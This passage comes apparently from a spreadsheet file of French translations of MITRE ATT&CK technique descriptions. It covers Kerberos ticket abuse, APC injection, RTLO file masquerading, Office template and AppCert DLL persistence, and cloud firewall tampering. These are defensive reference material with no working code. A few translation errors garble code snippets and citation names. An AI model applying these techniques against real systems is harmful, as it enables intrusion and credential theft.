Le service KDC s’exécute entièrement sur des contrôleurs de domaine qui font partie d’un domaine Active Directory. KRBTGT est le compte de service du centre de distribution de clés Kerberos (KDC) et est responsable du chiffrement et de la signature de tous les tickets Kerberos. (Référence : ADSecurity Kerberos et KRBTGT) Le hachage du mot de passe KRBTGT peut être obtenu à l’aide de [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) et d’un accès privilégié à un contrôleur de domaine.
https://attack.mitre.org/techniques/T1558/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exfiltrer des données, telles que des documents sensibles, par le biais d’un traitement automatisé après avoir été collectées lors de la collecte. (Citation : ESET Gamaredon juin 2020) 
Lorsque l’exfiltration automatisée est utilisée, d’autres techniques d’exfiltration s’appliquent probablement également pour transférer les informations hors du réseau, telles que [Exfiltration sur le canal C2](https://attack.mitre.org/techniques/T1041) et [Exfiltration sur un protocole alternatif](https://attack.mitre.org/techniques/T1048).
https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les configurations du client de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les configurations du client peuvent inclure une variété de détails et de paramètres, notamment le système d’exploitation/la version, la virtualisation, l’architecture (par exemple : 32 ou 64 bits), la langue et/ou le fuseau horaire.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’actions de collecte directes via [Analyse active](https://attack.mitre.org/techniques/T1595) (par exemple, ports d’écoute,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les configurations du client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[services à distance externes](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1592/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent désactiver ou modifier un pare-feu dans un environnement cloud pour contourner les contrôles qui limitent l’accès aux ressources cloud. Les pare-feu cloud sont distincts des pare-feu système décrits dans [Désactiver ou modifier le pare-feu système](https://attack.mitre.org/techniques/T1562/004). 
Les environnements cloud utilisent généralement des groupes de sécurité restrictifs et des règles de pare-feu qui n’autorisent l’activité réseau qu’à partir d’adresses IP de confiance via les ports et protocoles attendus. Un adversaire disposant des autorisations appropriées peut introduire de nouvelles règles ou politiques de pare-feu pour autoriser l’accès à un environnement cloud victime et/ou se déplacer latéralement du plan de contrôle du cloud au plan de données. Par exemple, un adversaire peut utiliser un script ou un utilitaire qui crée de nouvelles règles d’entrée dans des groupes de sécurité existants (ou crée entièrement de nouveaux groupes de sécurité) pour autoriser toute connectivité TCP/IP à une instance hébergée dans le cloud. (Citation : Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) Ils peuvent également supprimer les limitations de réseau pour prendre en charge le trafic associé à des activités malveillantes (telles que le minage de cryptomonnaie). (Citation : Expulser IO Evil dans AWS)(Citation : Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
La modification ou la désactivation d’un pare-feu cloud peut permettre des communications C2 adverses, des mouvements latéraux et/ou l’exfiltration de données qui ne seraient pas autorisés autrement. Il peut également être utilisé pour ouvrir des ressources pour la [Force brute](https://attack.mitre.org/techniques/T1110) ou le [Déni de service du point de terminaison](https://attack.mitre.org/techniques/T1499).
https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du caractère de remplacement de droite à gauche (RTLO ou RLO) (U+202E) pour dissimuler une chaîne et/ou un nom de fichier afin de le faire paraître inoffensif. RTLO est un caractère Unicode non imprimable qui provoque l’affichage du texte qui le suit à l’envers. Par exemple, un exécutable de l’économiseur d’écran Windows nommé &lt;code&gt;25 mars \u202Excod.scr s’affichera&lt;/code&gt; comme &lt;code&gt;25 mars rcs.docx&lt;/code&gt;. Un fichier JavaScript nommé &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; s’affichera sous &lt;code&gt;la forme photo_high_resj.png&lt;/code&gt;. (Citation : Infosecinstitute RTLO Technique)
Les adversaires peuvent abuser du caractère RTLO pour inciter un utilisateur à exécuter ce qu’il pense être un type de fichier inoffensif. Cette technique est couramment utilisée avec [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002), car elle peut tromper à la fois les utilisateurs finaux et les défenseurs s’ils ne sont pas conscients de la façon dont leurs outils affichent et affichent le caractère RTLO. L’utilisation du caractère RTLO a été observée dans de nombreuses tentatives d’intrusion ciblées et activités criminelles. (Citation : Trend Micro PPLAIDE RTLO)(Référence : Kaspersky RTLO Cyber Crime) RTLO peut également être utilisé dans le registre Windows, où regedit.exe affiche les caractères inversés, mais pas l’outil de ligne de commande reg.exe par défaut.
https://attack.mitre.org/techniques/T1036/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter, voler ou télécharger des logiciels malveillants qui peuvent être utilisés lors du ciblage. Les logiciels malveillants peuvent inclure des charges utiles, des droppers, des outils de post-compromission, des portes dérobées, des packers et des protocoles C2. Les adversaires peuvent acquérir des logiciels malveillants pour soutenir leurs opérations, obtenir un moyen de garder le contrôle des machines distantes, d’échapper aux défenses et d’exécuter des comportements post-compromission.
En plus de télécharger des logiciels malveillants gratuits sur Internet, les adversaires peuvent acheter ces fonctionnalités auprès d’entités tierces. Il peut s’agir d’entreprises technologiques spécialisées dans le développement de logiciels malveillants, de places de marché criminelles (y compris Malware-as-a-Service ou MaaS) ou de particuliers. En plus d’acheter des logiciels malveillants, les adversaires peuvent voler et réutiliser des logiciels malveillants auprès d’entités tierces (y compris d’autres adversaires).
https://attack.mitre.org/techniques/T1588/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le micrologiciel des composants pour qu’il persiste sur les systèmes. Certains adversaires peuvent utiliser des moyens sophistiqués pour compromettre les composants de l’ordinateur et installer un micrologiciel malveillant qui exécutera du code adverseur en dehors du système d’exploitation et du microprogramme ou du BIOS du système principal. Cette technique peut être similaire à celle du [Microprogramme système](https://attack.mitre.org/techniques/T1542/001), mais appliquée à d’autres composants/périphériques du système qui peuvent ne pas avoir la même capacité ou le même niveau de vérification de l’intégrité.
Les microprogrammes de composants malveillants peuvent fournir à la fois un niveau d’accès persistant aux systèmes malgré les défaillances potentielles typiques de maintien de l’accès et de réimages du disque dur, ainsi qu’un moyen d’échapper aux défenses logicielles de l’hôte et aux contrôles d’intégrité.
https://attack.mitre.org/techniques/T1542/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent supprimer ou modifier les artefacts générés dans les systèmes pour supprimer les preuves de leur présence ou entraver les défenses. Divers artefacts peuvent être créés par un adversaire ou quelque chose qui peut être attribué aux actions d’un adversaire. En règle générale, ces artefacts sont utilisés comme indicateurs défensifs liés aux événements surveillés, tels que les chaînes de caractères des fichiers téléchargés, les journaux générés à partir des actions de l’utilisateur et d’autres données analysées par les défenseurs. L’emplacement, le format et le type d’artefact (par exemple, la commande ou l’historique de connexion) sont souvent spécifiques à chaque plate-forme.
La suppression de ces indicateurs peut interférer avec la collecte d’événements, la création de rapports ou d’autres processus utilisés pour détecter les activités d’intrusion. Cela peut compromettre l’intégrité des solutions de sécurité en faisant en sorte que des événements notables ne soient pas signalés. Cette activité peut également entraver l’analyse judiciaire et l’intervention en cas d’incident, en raison du manque de données suffisantes pour déterminer ce qui s’est passé.
https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler des données en les exfiltrant via un protocole réseau chiffré symétriquement autre que celui du canal de commande et de contrôle existant. Les données peuvent également être envoyées à un autre emplacement réseau à partir du serveur de commande et de contrôle principal. 
Les algorithmes de chiffrement symétrique sont ceux qui utilisent des clés/secrets partagés ou identiques à chaque extrémité du canal. Cela nécessite un échange ou un accord préétabli/la possession de la valeur utilisée pour crypter et décrypter les données. 
Les protocoles réseau qui utilisent le chiffrement asymétrique utilisent souvent le chiffrement symétrique une fois les clés échangées, mais les adversaires peuvent choisir de partager manuellement les clés et d’implémenter des algorithmes de chiffrement symétrique (ex : RC4, AES) plutôt que d’utiliser des mécanismes intégrés dans un protocole. Cela peut entraîner plusieurs couches de chiffrement (dans les protocoles chiffrés nativement, tels que HTTPS) ou le chiffrement dans des protocoles qui ne sont généralement pas chiffrés (tels que HTTP ou FTP).
https://attack.mitre.org/techniques/T1048/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des modèles Microsoft Office pour obtenir la persistance sur un système compromis. Microsoft Office contient des modèles qui font partie des applications Office courantes et qui sont utilisés pour personnaliser les styles. Les modèles de base de l’application sont utilisés chaque fois qu’une application démarre. (Citation : Microsoft Change Normal Template)
Les macros Office Visual Basic pour Applications (VBA) (Référence : MSDN VBA dans Office) peuvent être insérées dans le modèle de base et utilisées pour exécuter du code au démarrage de l’application Office respective afin d’obtenir la persistance. Des exemples pour Word et Excel ont été découverts et publiés. Par défaut, Word dispose d’un modèle Normal.dotm créé qui peut être modifié pour inclure une macro malveillante. Excel n’a pas de fichier modèle créé par défaut, mais il est possible d’en ajouter un qui sera automatiquement chargé. (Citation : enigma0x3 normal.dotm)(Citation : Macros de modèle de bureau hexacorn) Les modèles partagés peuvent également être stockés et extraits à partir d’emplacements distants. (Citation : GlobalDotName juin 2019) 
Emplacement de Word Normal.dotm :&lt;br&gt;
&lt;code&gt;C :\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Emplacement du fichier Excel Personal.xlsb :&lt;br&gt;
&lt;code&gt;C :\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL. XLSB&lt;/code&gt;
Les adversaires peuvent également modifier l’emplacement du modèle de base pour qu’il pointe vers le leur en détournant l’ordre de recherche de l’application, par exemple Word 2016 recherchera d’abord Normal.dotm sous &lt;code&gt;C :\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, ou en modifiant la clé de registre GlobalDotName. En modifiant la clé de registre GlobalDotName, un adversaire peut spécifier un emplacement, un nom de fichier et une extension de fichier arbitraires à utiliser pour le modèle qui sera chargé au démarrage de l’application. Pour abuser de GlobalDotName, les adversaires peuvent d’abord avoir besoin d’enregistrer le modèle en tant que document de confiance ou de le placer dans un emplacement de confiance. (Citation : GlobalDotName juin 2019) 
Un adversaire peut avoir besoin d’activer l’exécution illimitée des macros en fonction de la politique de sécurité du système ou de l’entreprise sur l’utilisation des macros.
https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent louer des serveurs privés virtuels (VPS) qui peuvent être utilisés pendant le ciblage. Il existe une variété de fournisseurs de services cloud qui vendent des machines virtuelles/conteneurs en tant que service. En utilisant un VPS, les adversaires peuvent rendre difficile le lien physique entre eux et les opérations. L’utilisation d’une infrastructure cloud peut également permettre aux adversaires de provisionner, de modifier et d’arrêter rapidement leur infrastructure.
L’acquisition d’un VPS à utiliser dans les étapes ultérieures du cycle de vie de l’adversaire, telles que la commande et le contrôle, peut permettre aux adversaires de bénéficier de l’omniprésence et de la confiance associées aux fournisseurs de services cloud de meilleure réputation. Les adversaires peuvent également acquérir de l’infrastructure auprès de fournisseurs de services VPS connus pour louer des VPS avec un minimum d’informations d’enregistrement, ce qui permet des acquisitions d’infrastructure plus anonymes. (Citation : TrendmicroHideoutsLease)
https://attack.mitre.org/techniques/T1583/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les référentiels Confluence pour extraire des informations précieuses. Souvent présent dans les environnements de développement aux côtés d’Atlassian JIRA, Confluence est généralement utilisé pour stocker la documentation liée au développement, mais peut en général contenir des catégories plus diverses d’informations utiles, telles que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https://attack.mitre.org/techniques/T1213/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent « passer le ticket » à l’aide de tickets Kerberos volés pour se déplacer latéralement dans un environnement, en contournant les contrôles d’accès normaux au système. Pass the ticket (PtT) est une méthode d’authentification auprès d’un système à l’aide de tickets Kerberos sans avoir accès au mot de passe d’un compte. L’authentification Kerberos peut être utilisée comme première étape du mouvement latéral vers un système distant.
Lors de l’exécution de PtT, les tickets Kerberos valides pour les [Comptes valides](https://attack.mitre.org/techniques/T1078) sont capturés par [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003). Un ticket de service de l’utilisateur ou un ticket d’octroi de ticket (TGT) peut être obtenu, en fonction du niveau d’accès. Un ticket de service permet d’accéder à une ressource particulière, tandis qu’un TGT peut être utilisé pour demander des tickets de service au service d’octroi de tickets (TGS) afin d’accéder à toute ressource à laquelle l’utilisateur dispose de privilèges d’accès. (Citation : Attaques ADSecurity AD Kerberos)(Citation : GentilKiwi Pass the Ticket)
Un [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) peut être obtenu pour les services qui utilisent Kerberos comme mécanisme d’authentification et qui sont utilisés pour générer des tickets permettant d’accéder à cette ressource particulière et au système qui héberge la ressource (par exemple, SharePoint). (Citation : Attaques ADSecurity AD Kerberos)
Un [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) peut être obtenu pour le domaine à l’aide du hachage NTLM du compte du service de distribution de clés KRBTGT, qui permet de générer des TGT pour n’importe quel compte dans Active Directory. (Référence : Campbell 2014)
Les adversaires peuvent également créer un ticket Kerberos valide à l’aide d’autres informations utilisateur, telles que des hachages de mot de passe volés ou des clés AES. Par exemple, le « dépassement du hachage » implique l’utilisation d’un hachage de mot de passe NTLM pour s’authentifier en tant qu’utilisateur (c’est-à-dire [Passer le hachage](https://attack.mitre.org/techniques/T1550/002)) tout en utilisant le hachage de mot de passe pour créer un ticket Kerberos valide. (Citation : Stealthbits Overpass-the-Hash)
https://attack.mitre.org/techniques/T1550/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser d’un service d’administration de conteneur pour exécuter des commandes au sein d’un conteneur. Un service d’administration de conteneurs tel que le démon Docker, le serveur d’API Kubernetes ou le kubelet peut permettre la gestion à distance de conteneurs au sein d’un environnement. (Citation : Docker Daemon CLI)(Citation : API Kubernetes)(Citation : Kubernetes Kubelet)
Dans Docker, les adversaires peuvent spécifier un point d’entrée lors du déploiement du conteneur qui exécute un script ou une commande, ou ils peuvent utiliser une commande telle que &lt;code&gt;docker exec&lt;/code&gt; pour exécuter une commande dans un conteneur en cours d’exécution. (Citation : Docker Entrypoint)(Citation : Docker Exec) Dans Kubernetes, si un adversaire dispose d’autorisations suffisantes, il peut obtenir une exécution à distance dans un conteneur du cluster via une interaction avec le serveur d’API Kubernetes, le kubelet ou en exécutant une commande telle que &lt;code&gt;kubectl exec&lt;/code&gt;. (Citation : Kubectl Exec Get Shell)
https://attack.mitre.org/techniques/T1609</t>
  </si>
  <si>
    <t>Les adversaires peuvent énumérer des fichiers et des répertoires ou rechercher certaines informations au sein d’un système de fichiers dans des emplacements spécifiques d’un hôte ou d’un partage réseau. Les adversaires peuvent utiliser les informations de la [Découverte de fichiers et de répertoires](https://attack.mitre.org/techniques/T1083) lors de la découverte automatique pour façonner les comportements de suivi, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
De nombreux utilitaires d’interpréteur de commandes peuvent être utilisés pour obtenir ces informations. Il &lt;code&gt;s’agit&lt;/code&gt; par exemple &lt;code&gt;de dir&lt;/code&gt;, tree, &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt; et &lt;code&gt;locate&lt;/code&gt;. (Citation : Commandes Windows JPCERT) Des outils personnalisés peuvent également être utilisés pour collecter des informations sur les fichiers et les répertoires et interagir avec l'[API native](https://attack.mitre.org/techniques/T1106). Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour collecter des informations de fichiers et de répertoires (par exemple, &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;show flash&lt;/code&gt; et/ou &lt;code&gt;nvram&lt;/code&gt;). (Référence : US-CERT-TA18-106A)
L’accès à certains fichiers et répertoires peut nécessiter des autorisations d’utilisateur élevées ou spécifiques.
https://attack.mitre.org/techniques/T1083</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir dynamiquement des connexions à l’infrastructure de commande et de contrôle pour échapper aux détections et aux remédiations courantes. Cela peut être réalisé en utilisant des logiciels malveillants qui partagent un algorithme commun avec l’infrastructure que l’adversaire utilise pour recevoir les communications du logiciel malveillant. Ces calculs peuvent être utilisés pour ajuster dynamiquement des paramètres tels que le nom de domaine, l’adresse IP ou le numéro de port que le logiciel malveillant utilise pour la commande et le contrôle.
Les adversaires peuvent utiliser la résolution dynamique dans le but de créer des [Canaux de secours](https://attack.mitre.org/techniques/T1008). Lorsque le contact est perdu avec le serveur de commande et de contrôle principal, les logiciels malveillants peuvent utiliser la résolution dynamique comme moyen de rétablir la commande et le contrôle. (Citation : Talos CCleanup 2017)(Citation : FireEye POSHSPY avril 2017)(Citation : Activité ESET Sednit 2017)
https://attack.mitre.org/techniques/T1568</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de manipuler le nom d’une tâche ou d’un service pour le faire paraître légitime ou inoffensif. Les tâches/services exécutés par le planificateur de tâches ou systemd reçoivent généralement un nom et/ou une description. (Citation : TechNet Schtasks)(Citation : Unités de service Systemd) Les services Windows auront un nom de service ainsi qu’un nom d’affichage. Il existe de nombreuses tâches et services bénins qui ont des noms communément associés. Les adversaires peuvent donner à des tâches ou à des services des noms similaires ou identiques à ceux de sites légitimes.
Les tâches ou les services contiennent d’autres champs, tels qu’une description, que les adversaires peuvent tenter de faire paraître légitimes. (Citation : Palo Alto Shamoon, novembre 2016)(Citation : Fysbis Dr Web Analysis)
https://attack.mitre.org/techniques/T1036/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans les processus via la file d’attente d’appels de procédure asynchrone (APC) afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. L’injection APC est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
L’injection APC est généralement effectuée en attachant un code malveillant à la file d’attente APC (Citation : Microsoft APC) du thread d’un processus. Les fonctions APC en file d’attente sont exécutées lorsque le thread entre dans un état modifiable. (Citation : Microsoft APC) Un handle vers un processus victime existant est d’abord créé à l’aide d’appels d’API Windows natifs tels &lt;code&gt;qu’OpenThread&lt;/code&gt;. À ce stade&lt;code&gt;, QueueUserAPC&lt;/code&gt; peut être utilisé pour appeler une fonction (telle que &lt;code&gt;LoadLibrayA&lt;/code&gt; pointant vers une DLL malveillante). 
Une variante de l’injection APC, surnommée « injection Early Bird », consiste à créer un processus suspendu dans lequel du code malveillant peut être écrit et exécuté avant le point d’entrée du processus (et potentiellement les crochets anti-malware ultérieurs) via un APC. (Citation : CyberBit Early Bird avril 2018) AtomBombing (Citation : ENSIL AtomBombing Oct 2016) est une autre variante qui utilise des APC pour invoquer du code malveillant précédemment écrit dans la table globale atom. (Citation : Microsoft Atom Table)
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution via l’injection APC peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter la mise en miroir du trafic afin d’automatiser l’exfiltration de données sur une infrastructure compromise. La mise en miroir du trafic est une fonctionnalité native pour certains appareils, souvent utilisée pour l’analyse du réseau. Par exemple, les périphériques peuvent être configurés pour transférer le trafic réseau vers une ou plusieurs destinations à des fins d’analyse par un analyseur de réseau ou un autre dispositif de surveillance. (Citation : Cisco Traffic Mirroring)(Citation : Mise en miroir du trafic Juniper)
Les adversaires peuvent abuser de la mise en miroir du trafic pour refléter ou rediriger le trafic réseau via d’autres infrastructures qu’ils contrôlent. Des modifications malveillantes des périphériques réseau pour permettre la redirection du trafic peuvent être possibles via [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) ou [Patch System Image](https://attack.mitre.org/techniques/T1601/001). (Référence : US-CERT-TA18-106A)(Citation : Blog Cisco Legacy Device Attacks)
De nombreux environnements basés sur le cloud prennent également en charge la mise en miroir du trafic. Par exemple, AWS Traffic Mirroring, GCP Packet Mirroring et Azure vTap permettent aux utilisateurs de définir des instances spécifiées à partir desquelles collecter le trafic et des cibles spécifiées auxquelles envoyer le trafic collecté. (Citation : Mise en miroir du trafic AWS)(Citation : Mise en miroir des paquets GCP)(Référence : Azure Virtual Network TAP)
Les adversaires peuvent utiliser la duplication du trafic conjointement avec [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056) ou [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) en fonction des buts et objectifs de l’adversaire.
https://attack.mitre.org/techniques/T1020/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les fichiers de liste de propriétés (fichiers plist) pour permettre d’autres activités malveillantes, tout en évitant et en contournant les défenses du système. Les applications macOS utilisent des fichiers plist, tels que le fichier &lt;code&gt;info.plist&lt;/code&gt;, pour stocker les propriétés et les paramètres de configuration qui informent le système d’exploitation sur la façon de gérer l’application au moment de l’exécution. Les fichiers Plist sont des métadonnées structurées en paires clé-valeur formatées en XML basées sur la DTD Core Foundation d’Apple. Les fichiers Plist peuvent être enregistrés au format texte ou binaire. (Citation : fileinfo plist file description) 
Les adversaires peuvent modifier les paires clé-valeur dans les fichiers plist pour influencer les comportements du système, par exemple en masquant l’exécution d’une application (par exemple, [Fenêtre cachée](https://attack.mitre.org/techniques/T1564/003)) ou en exécutant des commandes supplémentaires pour la persistance (ex : [Agent de lancement](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) ou [Applications rouvertes](https://attack.mitre.org/techniques/T1547/007)).
Par exemple, les adversaires peuvent ajouter un chemin d’accès d’application malveillant au fichier « ~/Library/Preferences/com.apple.dock.plist », qui contrôle les applications qui apparaissent dans le Dock. Les adversaires peuvent également modifier la clé &lt;code&gt;LSUIElement&lt;/code&gt; dans le fichier &lt;code&gt;info.plist&lt;/code&gt; d’une application pour exécuter l’application en arrière-plan. Les adversaires peuvent également insérer des paires clé-valeur pour insérer des variables d’environnement, telles que &lt;code&gt;LSEnvironment&lt;/code&gt;, afin d’activer la persistance via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006). (Citation : persistance de wardle chp2)(Référence : eset_osx_flashback)
https://attack.mitre.org/techniques/T1647</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et/ou élever des privilèges en exécutant du contenu malveillant déclenché par des DLL AppCert chargées dans des processus. Les bibliothèques de liens dynamiques (DLL) spécifiées dans la clé de registre &lt;code&gt;AppCertDLLs&lt;/code&gt; sous &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\&lt;/code&gt; sont chargées dans chaque processus qui appelle les fonctions d’interface de programmation d’application (API) utilisées de manière omniprésente &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; ou &lt;code&gt;WinExec&lt;/code&gt;. (Citation : Injection de processus élastique juillet 2017)
À l’instar de [Process Injection](https://attack.mitre.org/techniques/T1055), cette valeur peut être utilisée de manière abusive pour obtenir des privilèges élevés en provoquant le chargement et l’exécution d’une DLL malveillante dans le contexte de processus distincts sur l’ordinateur. Les DLL AppCert malveillantes peuvent également fournir une persistance en étant continuellement déclenchées par l’activité de l’API.
https://attack.mitre.org/techniques/T1546/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent configurer des règles de transfert d’e-mails pour collecter des informations sensibles. Les adversaires peuvent abuser des règles de transfert d’e-mails pour surveiller les activités d’une victime, voler des informations et obtenir des informations sur la victime ou sur l’organisation de la victime afin de les utiliser dans le cadre d’autres exploits ou opérations. (Référence : US-CERT TA18-068A 2018) De plus, les règles de transfert d’e-mails peuvent permettre aux adversaires de conserver un accès persistant aux e-mails de la victime, même après la réinitialisation des informations d’identification compromises par les administrateurs. (citation : pfammatter - règles de boîte de réception cachées) La plupart des clients de messagerie permettent aux utilisateurs de créer des règles de boîte de réception pour diverses fonctions de messagerie, y compris le transfert vers un autre destinataire. Ces règles peuvent être créées par le biais d’une application de messagerie locale, d’une interface Web ou d’une interface de ligne de commande. Les messages peuvent être transférés à des destinataires internes ou externes, et il n’existe aucune restriction limitant l’étendue de cette règle. Les administrateurs peuvent également créer des règles de transfert pour les comptes d’utilisateur avec les mêmes considérations et résultats. (Citation : Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation : Règles de transfert Mac)
Tout utilisateur ou administrateur de l’organisation (ou tout adversaire disposant d’informations d’identification valides) peut créer des règles pour transférer automatiquement tous les messages reçus à un autre destinataire, transférer les e-mails vers différents emplacements en fonction de l’expéditeur, etc. Les adversaires peuvent également masquer la règle en utilisant l’API de messagerie Microsoft (MAPI) pour modifier les propriétés de la règle, ce qui la rend masquée et non visible à partir d’Outlook, d’OWA ou de la plupart des outils d’administration Exchange. (citation : pfammatter - règles de boîte de réception cachées)
Dans certains environnements, les administrateurs peuvent être en mesure d’activer des règles de transfert d’e-mails qui s’appliquent à l’ensemble de l’organisation plutôt qu’aux boîtes de réception individuelles. Par exemple, Microsoft Exchange prend en charge les règles de transport qui évaluent tous les messages qu’une organisation reçoit par rapport aux conditions spécifiées par l’utilisateur, puis effectuent une action spécifiée par l’utilisateur sur les messages qui respectent ces conditions. (Citation : Règles de flux de messagerie Microsoft 2023) Les adversaires qui abusent de ces fonctionnalités peuvent être en mesure d’activer le transfert de tout le courrier reçu par une organisation ou d’un courrier spécifique.
https://attack.mitre.org/techniques/T1114/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent regrouper les données collectées dans un emplacement central ou un répertoire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(Citation : PWC Cloud Hopper, avril 2017)
Dans les environnements cloud, les adversaires peuvent regrouper les données au sein d’une instance ou d’une machine virtuelle particulière avant de les exfiltrer. Un adversaire peut [Créer une instance cloud](https://attack.mitre.org/techniques/T1578/002) et regrouper les données dans cette instance. (Citation : Mandiant M-Trends 2020)
Les adversaires peuvent choisir de regrouper les données d’un réseau victime dans un emplacement centralisé avant l’exfiltration afin de minimiser le nombre de connexions établies à leur serveur C2 et de mieux échapper à la détection.
https://attack.mitre.org/techniques/T1074</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler ou falsifier des certificats utilisés pour l’authentification afin d’accéder à des systèmes ou des ressources distants. Les certificats numériques sont souvent utilisés pour signer et chiffrer des messages et/ou des fichiers. Les certificats sont également utilisés comme matériel d’authentification. Par exemple, les certificats d’appareil Entra ID et les certificats AD CS (Active Directory Certificate Services) sont liés à une identité et peuvent être utilisés comme informations d’identification pour les comptes de domaine. (Citation : O365 Blog Azure AD Device IDs)(Citation : Présentation de Microsoft AD CS)
Les certificats d’authentification peuvent être à la fois volés et falsifiés. Par exemple, les certificats AD CS peuvent être volés à partir d’un stockage chiffré (dans le registre ou des fichiers) (Citation : APT29 Deep Look at Credential Roaming), de fichiers de certificats égarés (c’est-à-dire [Informations d’identification non sécurisées](https://attack.mitre.org/techniques/T1552)), ou directement à partir du magasin de certificats Windows via diverses API de chiffrement. (Citation : SpecterOps Certified Pre Owned)(Citation : GitHub CertStealer)(Citation : Certificats GitHub GhostPack) Avec les droits d’inscription appropriés, les utilisateurs et/ou les machines d’un domaine peuvent également demander et/ou renouveler manuellement des certificats auprès des autorités de certification d’entreprise. Ce processus d’inscription définit divers paramètres et autorisations associés au certificat. Il convient de noter que les valeurs d’utilisation de clé étendue (EKU) du certificat définissent les cas d’utilisation de la signature, du chiffrement et de l’authentification, tandis que les valeurs de nom alternatif de l’objet (SAN) du certificat définissent les autres noms du propriétaire du certificat. (Citation : Medium Certified Pre Owned)
L’utilisation abusive de certificats pour les informations d’identification d’authentification peut entraîner d’autres comportements tels que [Mouvement latéral](https://attack.mitre.org/tactics/TA0008). Les erreurs de configuration liées aux certificats peuvent également ouvrir la voie à une [élévation de privilèges](https://attack.mitre.org/tactics/TA0004), en permettant aux utilisateurs d’emprunter l’identité d’un utilisateur ou d’usurper des comptes privilégiés ou d’obtenir des autorisations via les identités (SAN) associées à un certificat. Ces abus peuvent également permettre la [persistance](https://attack.mitre.org/tactics/TA0003) via le vol ou la falsification de certificats qui peuvent être utilisés comme [comptes valides](https://attack.mitre.org/techniques/T1078) pendant la durée de validité du certificat, malgré la réinitialisation du mot de passe de l’utilisateur. Les certificats d’authentification peuvent également être volés et falsifiés pour les comptes de machine.
Les adversaires qui ont accès aux clés privées du certificat de l’autorité de certification racine (ou subordonnée) (ou aux mécanismes de protection/gestion de ces clés) peuvent également établir la [persistance](https://attack.mitre.org/tactics/TA0003) en falsifiant des certificats d’authentification arbitraires pour le domaine victime (appelés certificats « dorés »). (Citation : Medium Certified Pre Owned) Les adversaires peuvent également cibler des certificats et des services associés afin d’accéder à d’autres formes d’informations d’identification, telles que [Golden Ticket](https://attack.mitre.org/techniques/T1558/001), les tickets d’octroi de tickets (TGT) ou NTLM en texte brut. (Citation : Medium Certified Pre Owned)
https://attack.mitre.org/techniques/T1649</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer un appareil sur un compte contrôlé par l’adversaire. Les appareils peuvent être inscrits dans un système d’authentification multifacteur (MFA), qui gère l’authentification auprès du réseau, ou dans un système de gestion des appareils, qui gère l’accès aux appareils et la conformité.
